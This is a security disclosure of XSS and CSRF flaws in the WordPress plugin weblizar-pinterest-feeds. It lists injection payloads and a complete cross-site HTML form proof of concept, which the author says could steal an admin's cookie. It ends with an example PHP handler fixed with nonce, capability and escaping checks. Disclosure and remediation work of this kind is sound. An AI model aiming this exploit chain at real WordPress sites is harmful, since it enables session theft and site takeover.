Well, sir, I just found an XSS bug and a CSRF bug in the WordPress plugin weblizar-pinterest-feeds.
ADLab of Venustech
XSS
http://127.0.0.1/wordpress/wp-admin/admin-ajax.php
When I pentested the parameters, I found they are not filtered properly.
Vulnerable parameters:
1. PFFREE_Access_Token=test'"><svg/onload=console.log(/xss1/)><'"
2. weblizar_pffree_settings_save_get-users=1'"><svg/onload=console.log(/xss2/)><'"
3. action=pffree_security&security=test'"><svg/onload=console.log(/xss3/)><'"
CSRF
Well, the XSS here needs to be combined with a CSRF bug. Because there is no CSRF protection here, we can trick the admin user into visiting the evil HTML on the evil site.
PoC:
<html>
<body>
<!-- hide the real URL in the address bar while the page is open -->
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/wordpress/wp-admin/admin-ajax.php" method="POST">
<!-- the double quotes inside the payloads are entity-encoded (&quot;) so the attribute values stay well-formed and the full payload is submitted -->
<input type="hidden" name="PFFREE_Access_Token" value="test'&quot;><svg/onload=console.log(/xss1/)><'&quot;" />
<input type="hidden" name="weblizar_pffree_settings_save_get-users" value="1'&quot;><svg/onload=console.log(/xss2/)><'&quot;" />
<input type="hidden" name="action" value="pffree_security" />
<input type="hidden" name="security" value="test'&quot;><svg/onload=console.log(/xss3/)><'&quot;" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
In a word, if the manager could be tricked into visiting my evil HTML on my site, I could get the manager's cookie easily, or do something more evil.
Well, by the way, I only tested the bug in WordPress 4.9.1 and the latest version of the plugin weblizar-pinterest-feeds.
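For reference, this is what a fixed admin-ajax.php handler for the "pffree_security" action would look like, covering both the missing CSRF check and the unescaped reflection of the three parameters above. This is an added example written for this report; it is not the plugin's code, and the function names, the nonce action string "example_pffree_nonce" and the option name "example_pffree_settings" are assumptions. Only the action name and the request parameter names come from the report.

```php
<?php
// Added example (not weblizar-pinterest-feeds code): a hardened handler for the
// "pffree_security" AJAX action. Function names, the nonce action string and the
// option name are assumptions for illustration.

// 1. Register for logged-in users only. Not registering a "wp_ajax_nopriv_"
//    variant keeps anonymous requests out of this code path entirely.
add_action( 'wp_ajax_pffree_security', 'example_pffree_security_handler' );

function example_pffree_security_handler() {
    // 2. CSRF: require a valid nonce in the "security" parameter. A cross-site
    //    form like the PoC cannot know the nonce, so check_ajax_referer() stops
    //    the request (wp_die with HTTP 403) before anything is stored or echoed.
    check_ajax_referer( 'example_pffree_nonce', 'security' );

    // 3. Authorization: a nonce proves intent, not privilege. Only users who
    //    may manage options should be able to change plugin settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient privileges.' ), 403 );
    }

    // 4. Input: read only the expected parameters and sanitize each one for its
    //    type instead of storing raw $_POST data.
    $token = isset( $_POST['PFFREE_Access_Token'] )
        ? sanitize_text_field( wp_unslash( $_POST['PFFREE_Access_Token'] ) )
        : '';
    $get_users = isset( $_POST['weblizar_pffree_settings_save_get-users'] )
        ? absint( $_POST['weblizar_pffree_settings_save_get-users'] )
        : 0;

    update_option( 'example_pffree_settings', array(
        'access_token' => $token,
        'get_users'    => $get_users,
    ) );

    // 5. Output: anything reflected back is escaped for its context, so a value
    //    such as  test'"><svg/onload=...>  is rendered as text, not markup.
    wp_send_json_success( array(
        'access_token' => esc_attr( $token ),
        'get_users'    => $get_users,
    ) );
}

// 6. The legitimate settings page is the only place that can obtain a nonce the
//    handler accepts, and it prints stored values through esc_attr() as well.
function example_pffree_render_settings_fields() {
    $settings = get_option( 'example_pffree_settings', array( 'access_token' => '' ) );
    $nonce    = wp_create_nonce( 'example_pffree_nonce' );
    printf(
        '<input type="text" name="PFFREE_Access_Token" value="%s" />'
        . '<input type="hidden" name="action" value="pffree_security" />'
        . '<input type="hidden" name="security" value="%s" />',
        esc_attr( $settings['access_token'] ),
        esc_attr( $nonce )
    );
}
```

With the nonce check in place the PoC form above fails at step 2 regardless of its payloads, and with the escaping in steps 4 and 5 the payloads would be stored and echoed as inert text even if a request did get through; the two fixes are independent and both are needed, since the nonce alone does nothing for a logged-in admin who pastes a malicious value into the settings page.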
